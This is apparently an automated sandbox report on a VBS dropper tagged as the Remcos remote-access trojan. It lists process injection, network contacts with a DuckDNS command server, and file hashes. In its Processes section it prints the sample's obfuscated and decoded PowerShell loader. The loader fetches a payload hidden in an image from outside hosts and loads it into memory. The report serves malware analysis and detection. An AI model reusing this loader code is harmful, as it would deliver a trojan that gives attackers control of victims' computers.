Malware Analysis Report

2024-12-07 22:48

Sample ID 240511-nvyehaee6x
Target sostener.vbs
SHA256 d99ef4f74f7929ccab7db338318181e2813b7d4e9259a95e6d1a70441e52f4ff
Tags
remcos fenix execution rat
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

d99ef4f74f7929ccab7db338318181e2813b7d4e9259a95e6d1a70441e52f4ff

Threat Level: Known bad

The file sostener.vbs was found to be: Known bad.

Malicious Activity Summary

remcos fenix execution rat

Remcos

Blocklisted process makes network request

Command and Scripting Interpreter: PowerShell

Checks computer location settings

Suspicious use of SetThreadContext

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Suspicious use of SetWindowsHookEx

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-05-11 11:43

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-05-11 11:43

Reported

2024-05-11 11:46

Platform

win7-20240508-en

Max time kernel

149s

Max time network

138s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\sostener.vbs"

Signatures

Remcos

rat remcos

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 1684 set thread context of 2164 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.Net\Framework\v4.0.30319\AddInProcess32.exe

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\Microsoft.Net\Framework\v4.0.30319\AddInProcess32.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2556 wrote to memory of 536 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2556 wrote to memory of 536 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2556 wrote to memory of 536 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 536 wrote to memory of 1684 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 536 wrote to memory of 1684 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 536 wrote to memory of 1684 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1684 wrote to memory of 2164 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.Net\Framework\v4.0.30319\AddInProcess32.exe
PID 1684 wrote to memory of 2164 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.Net\Framework\v4.0.30319\AddInProcess32.exe
PID 1684 wrote to memory of 2164 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.Net\Framework\v4.0.30319\AddInProcess32.exe
PID 1684 wrote to memory of 2164 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.Net\Framework\v4.0.30319\AddInProcess32.exe
PID 1684 wrote to memory of 2164 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.Net\Framework\v4.0.30319\AddInProcess32.exe
PID 1684 wrote to memory of 2164 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.Net\Framework\v4.0.30319\AddInProcess32.exe
PID 1684 wrote to memory of 2164 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.Net\Framework\v4.0.30319\AddInProcess32.exe
PID 1684 wrote to memory of 2164 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.Net\Framework\v4.0.30319\AddInProcess32.exe
PID 1684 wrote to memory of 2164 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.Net\Framework\v4.0.30319\AddInProcess32.exe
PID 1684 wrote to memory of 2164 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.Net\Framework\v4.0.30319\AddInProcess32.exe
PID 1684 wrote to memory of 2164 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.Net\Framework\v4.0.30319\AddInProcess32.exe
PID 1684 wrote to memory of 2164 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.Net\Framework\v4.0.30319\AddInProcess32.exe
PID 1684 wrote to memory of 2164 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.Net\Framework\v4.0.30319\AddInProcess32.exe

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\sostener.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMwDgTrevDgTreDcDgTreOQDgTre3DgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreODgTreDgTre4DgTreDIDgTreMDgTreDgTreyDgTreDkDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMwDgTrevDgTreDcDgTreOQDgTre3DgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreODgTreDgTre4DgTreDIDgTreMDgTreDgTreyDgTreDkDgTreJwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTre7DgTreCDgTreDgTreaQBmDgTreCDgTreDgTreKDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTretDgTreG4DgTreZQDgTregDgTreCQDgTrebgB1DgTreGwDgTrebDgTreDgTrepDgTreCDgTreDgTreewDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreFQDgTreZQB4DgTreHQDgTreLgBFDgTreG4DgTreYwBvDgTreGQDgTreaQBuDgTreGcDgTreXQDgTre6DgTreDoDgTreVQBUDgTreEYDgTreODgTreDgTreuDgTreEcDgTreZQB0DgTreFMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreQgB5DgTreHQDgTreZQBzDgTreCkDgTreOwDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEYDgTrebDgTreBhDgTreGcDgTreIDgTreDgTre9DgTreCDgTreDgTreJwDgTre8DgTreDwDgTreQgBBDgTreFMDgTreRQDgTre2DgTreDQDgTreXwBTDgTreFQDgTreQQBSDgTreFQDgTrePgDgTre+DgTreCcDgTreOwDgTregDgTreCQDgTreZQBuDgTreGQDgTreRgBsDgTreGEDgTreZwDgTregDgTreD0DgTreIDgTreDgTrenDgTreDwDgTrePDgTreBCDgTreEEDgTreUwBFDgTreDYDgTreNDgTreBfDgTreEUDgTreTgBEDgTreD4DgTrePgDgTrenDgTreDsDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreEkDgTrebgBkDgTreGUDgTreeDgTreBPDgTreGYDgTreKDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreCkDgTreOwDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTrePQDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreLgBJDgTreG4DgTreZDgTreBlDgTreHgDgTreTwBmDgTreCgDgTreJDgTreBlDgTreG4DgTreZDgTreBGDgTreGwDgTreYQBnDgTreCkDgTreOwDgTregDgTreGkDgTreZgDgTregDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQBnDgTreGUDgTreIDgTreDgTrewDgTreCDgTreDgTreLQBhDgTreG4DgTreZDgTreDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQBnDgTreHQDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreKQDgTregDgTreHsDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreC4DgTreTDgTreBlDgTreG4DgTreZwB0DgTreGgDgTreOwDgTregDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreTDgTreBlDgTreG4DgTreZwB0DgTreGgDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBlDgTreG4DgTreZDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTretDgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreDsDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEMDgTrebwBtDgTreG0DgTreYQBuDgTreGQDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreFMDgTredQBiDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCwDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEwDgTreZQBuDgTreGcDgTredDgTreBoDgTreCkDgTreOwDgTregDgTreCQDgTreYwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreEMDgTrebwBuDgTreHYDgTreZQByDgTreHQDgTreXQDgTre6DgTreDoDgTreRgByDgTreG8DgTrebQBCDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBTDgTreHQDgTrecgBpDgTreG4DgTreZwDgTreoDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreQwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQDgTregDgTreD0DgTreIDgTreBbDgTreFMDgTreeQBzDgTreHQDgTreZQBtDgTreC4DgTreUgBlDgTreGYDgTrebDgTreBlDgTreGMDgTredDgTreBpDgTreG8DgTrebgDgTreuDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQBdDgTreDoDgTreOgBMDgTreG8DgTreYQBkDgTreCgDgTreJDgTreBjDgTreG8DgTrebQBtDgTreGEDgTrebgBkDgTreEIDgTreeQB0DgTreGUDgTrecwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHQDgTreeQBwDgTreGUDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBBDgTreHMDgTrecwBlDgTreG0DgTreYgBsDgTreHkDgTreLgBHDgTreGUDgTredDgTreBUDgTreHkDgTrecDgTreBlDgTreCgDgTreJwBQDgTreFIDgTreTwBKDgTreEUDgTreVDgTreBPDgTreEEDgTreVQBUDgTreE8DgTreTQBBDgTreEMDgTreQQBPDgTreC4DgTreVgBCDgTreC4DgTreSDgTreBvDgTreG0DgTreZQDgTrenDgTreCkDgTreOwDgTregDgTreCQDgTrebQBlDgTreHQDgTreaDgTreBvDgTreGQDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreB0DgTreHkDgTrecDgTreBlDgTreC4DgTreRwBlDgTreHQDgTreTQBlDgTreHQDgTreaDgTreBvDgTreGQDgTreKDgTreDgTrenDgTreFYDgTreQQBJDgTreCcDgTreKQDgTreuDgTreEkDgTrebgB2DgTreG8DgTreawBlDgTreCgDgTreJDgTreBuDgTreHUDgTrebDgTreBsDgTreCwDgTreIDgTreBbDgTreG8DgTreYgBqDgTreGUDgTreYwB0DgTreFsDgTreXQBdDgTreCDgTreDgTreKDgTreDgTrenDgTreDDgTreDgTreLwBjDgTreEEDgTreYwBSDgTreGEDgTreLwBkDgTreC8DgTreZQBlDgTreC4DgTreZQB0DgTreHMDgTreYQBwDgTreC8DgTreLwDgTre6DgTreHMDgTrecDgTreB0DgTreHQDgTreaDgTreDgTrenDgTreCDgTreDgTreLDgTreDgTregDgTreCcDgTreZDgTreBlDgTreHMDgTreYQB0DgTreGkDgTredgBhDgTreGQDgTrebwDgTrenDgTreCDgTreDgTreLDgTreDgTregDgTreCcDgTreZDgTreBlDgTreHMDgTreYQB0DgTreGkDgTredgBhDgTreGQDgTrebwDgTrenDgTreCDgTreDgTreLDgTreDgTregDgTreCcDgTreZDgTreBlDgTreHMDgTreYQB0DgTreGkDgTredgBhDgTreGQDgTrebwDgTrenDgTreCwDgTreJwBBDgTreGQDgTreZDgTreBJDgTreG4DgTreUDgTreByDgTreG8DgTreYwBlDgTreHMDgTrecwDgTrezDgTreDIDgTreJwDgTresDgTreCcDgTreJwDgTrepDgTreCkDgTrefQDgTregDgTreH0DgTre';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('DgTre','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $OWjuxD"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029', 'https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('0/cAcRa/d/ee.etsap//:sptth' , 'desativado' , 'desativado' , 'desativado','AddInProcess32',''))} }"

C:\Windows\Microsoft.Net\Framework\v4.0.30319\AddInProcess32.exe

"C:\Windows\Microsoft.Net\Framework\v4.0.30319\AddInProcess32.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 paste.ee udp
US 172.67.187.200:443 paste.ee tcp
US 8.8.8.8:53 uploaddeimagens.com.br udp
US 104.21.45.138:443 uploaddeimagens.com.br tcp
US 8.8.8.8:53 apps.identrust.com udp
US 2.18.190.81:80 apps.identrust.com tcp
US 172.67.187.200:443 paste.ee tcp
US 8.8.8.8:53 newssssssssssssss.duckdns.org udp
CO 191.93.112.225:2404 newssssssssssssss.duckdns.org tcp
CO 191.93.112.225:2404 newssssssssssssss.duckdns.org tcp
CO 191.93.112.225:2404 newssssssssssssss.duckdns.org tcp
CO 191.93.112.225:2404 newssssssssssssss.duckdns.org tcp
CO 191.93.112.225:2404 newssssssssssssss.duckdns.org tcp
CO 191.93.112.225:2404 newssssssssssssss.duckdns.org tcp
CO 191.93.112.225:2404 newssssssssssssss.duckdns.org tcp
CO 191.93.112.225:2404 newssssssssssssss.duckdns.org tcp
CO 191.93.112.225:2404 newssssssssssssss.duckdns.org tcp
CO 191.93.112.225:2404 newssssssssssssss.duckdns.org tcp
CO 191.93.112.225:2404 newssssssssssssss.duckdns.org tcp
CO 191.93.112.225:2404 newssssssssssssss.duckdns.org tcp
CO 191.93.112.225:2404 newssssssssssssss.duckdns.org tcp
CO 191.93.112.225:2404 newssssssssssssss.duckdns.org tcp
CO 191.93.112.225:2404 newssssssssssssss.duckdns.org tcp
CO 191.93.112.225:2404 newssssssssssssss.duckdns.org tcp
CO 191.93.112.225:2404 newssssssssssssss.duckdns.org tcp
CO 191.93.112.225:2404 newssssssssssssss.duckdns.org tcp
CO 191.93.112.225:2404 newssssssssssssss.duckdns.org tcp
CO 191.93.112.225:2404 newssssssssssssss.duckdns.org tcp
CO 191.93.112.225:2404 newssssssssssssss.duckdns.org tcp
US 8.8.8.8:53 newssssssssssssss.duckdns.org udp
CO 191.93.112.225:2404 newssssssssssssss.duckdns.org tcp
CO 191.93.112.225:2404 newssssssssssssss.duckdns.org tcp
CO 191.93.112.225:2404 newssssssssssssss.duckdns.org tcp
CO 191.93.112.225:2404 newssssssssssssss.duckdns.org tcp
CO 191.93.112.225:2404 newssssssssssssss.duckdns.org tcp
CO 191.93.112.225:2404 newssssssssssssss.duckdns.org tcp
CO 191.93.112.225:2404 newssssssssssssss.duckdns.org tcp
CO 191.93.112.225:2404 newssssssssssssss.duckdns.org tcp
CO 191.93.112.225:2404 newssssssssssssss.duckdns.org tcp
CO 191.93.112.225:2404 newssssssssssssss.duckdns.org tcp
CO 191.93.112.225:2404 newssssssssssssss.duckdns.org tcp
CO 191.93.112.225:2404 newssssssssssssss.duckdns.org tcp
CO 191.93.112.225:2404 newssssssssssssss.duckdns.org tcp
CO 191.93.112.225:2404 newssssssssssssss.duckdns.org tcp
US 8.8.8.8:53 newssssssssssssss.duckdns.org udp
CO 191.93.112.225:2404 newssssssssssssss.duckdns.org tcp

Files

C:\Users\Admin\AppData\Local\Temp\Tar27B1.tmp

MD5 435a9ac180383f9fa094131b173a2f7b
SHA1 76944ea657a9db94f9a4bef38f88c46ed4166983
SHA256 67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34
SHA512 1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a

C:\Users\Admin\AppData\Local\Temp\Cab279F.tmp

MD5 29f65ba8e88c063813cc50a4ea544e93
SHA1 05a7040d5c127e68c25d81cc51271ffb8bef3568
SHA256 1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184
SHA512 e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

memory/536-148-0x000007FEF5EFE000-0x000007FEF5EFF000-memory.dmp

memory/536-149-0x000000001B520000-0x000000001B802000-memory.dmp

memory/536-150-0x0000000002810000-0x0000000002818000-memory.dmp

memory/536-151-0x000007FEF5C40000-0x000007FEF65DD000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 54638587970ac5855312e74e698363e3
SHA1 f4929fd2ddc62e665a46702e0d16435e714f4da2
SHA256 66d5450e6b516ed1a1a7cd75a6890fa648c076aa8107d3757715255b67b1820a
SHA512 362ff6b5db69404c8dd045fafa5c1a4e80d20398588dfa1dff97a07aaa863f572d31b9d9a9c4a46eb93fad9a93c4dda9244b5aed48c70a7036a5950753b3542a

memory/536-152-0x000007FEF5C40000-0x000007FEF65DD000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 94fb58ba74736e726c5831cbd6eebaac
SHA1 c30ff415431c890f9b3a610845f8b7bb9393bfc2
SHA256 eddc67e476897b2e57afef5dbdc3376d9a6214a5901b2d95a1ff152f770dab97
SHA512 e485f8e7bbc67fca978504a9f4d13e83ae79899a2eabe20d26f299aaae0959a8a011cc90139229e8e1eb32940450cd994c36f2464e4f49ff73c6d119627891e4

memory/536-240-0x000007FEF5C40000-0x000007FEF65DD000-memory.dmp

memory/1684-241-0x000000001ADC0000-0x000000001B080000-memory.dmp

memory/2164-244-0x0000000000400000-0x0000000000482000-memory.dmp

memory/2164-252-0x0000000000400000-0x0000000000482000-memory.dmp

memory/2164-254-0x0000000000400000-0x0000000000482000-memory.dmp

memory/2164-256-0x0000000000400000-0x0000000000482000-memory.dmp

memory/2164-258-0x0000000000400000-0x0000000000482000-memory.dmp

memory/2164-260-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/2164-261-0x0000000000400000-0x0000000000482000-memory.dmp

memory/2164-246-0x0000000000400000-0x0000000000482000-memory.dmp

memory/2164-248-0x0000000000400000-0x0000000000482000-memory.dmp

memory/2164-250-0x0000000000400000-0x0000000000482000-memory.dmp

memory/2164-262-0x0000000000400000-0x0000000000482000-memory.dmp

memory/2164-263-0x0000000000400000-0x0000000000482000-memory.dmp

memory/2164-266-0x0000000000400000-0x0000000000482000-memory.dmp

memory/2164-267-0x0000000000400000-0x0000000000482000-memory.dmp

memory/536-268-0x000007FEF5C40000-0x000007FEF65DD000-memory.dmp

memory/2164-269-0x0000000000400000-0x0000000000482000-memory.dmp

memory/2164-270-0x0000000000400000-0x0000000000482000-memory.dmp

memory/2164-271-0x0000000000400000-0x0000000000482000-memory.dmp

memory/2164-273-0x0000000000400000-0x0000000000482000-memory.dmp

memory/2164-274-0x0000000000400000-0x0000000000482000-memory.dmp

memory/2164-275-0x0000000000400000-0x0000000000482000-memory.dmp

memory/2164-276-0x0000000000400000-0x0000000000482000-memory.dmp

memory/2164-278-0x0000000000400000-0x0000000000482000-memory.dmp

memory/2164-279-0x0000000000400000-0x0000000000482000-memory.dmp

memory/2164-281-0x0000000000400000-0x0000000000482000-memory.dmp

memory/2164-283-0x0000000000400000-0x0000000000482000-memory.dmp

memory/2164-284-0x0000000000400000-0x0000000000482000-memory.dmp

memory/2164-285-0x0000000000400000-0x0000000000482000-memory.dmp

C:\ProgramData\remcos\registros.dat

MD5 b76a70eb23ee34b51420ff9ab6ca6ea3
SHA1 c1c1cacb78d6cc55cd48ea50ea64d11eb05bf958
SHA256 4c3c496974460f5277748430b2a44d523c1cbddc662401368a24330c521c7faf
SHA512 056540d9182c6c7874e6354e0ac46df88519b1324d5b05708dcbac031789a01cfa04b3cff66950b61056236293be4d344bd0de48b80e9a9350b488cb7e387fed

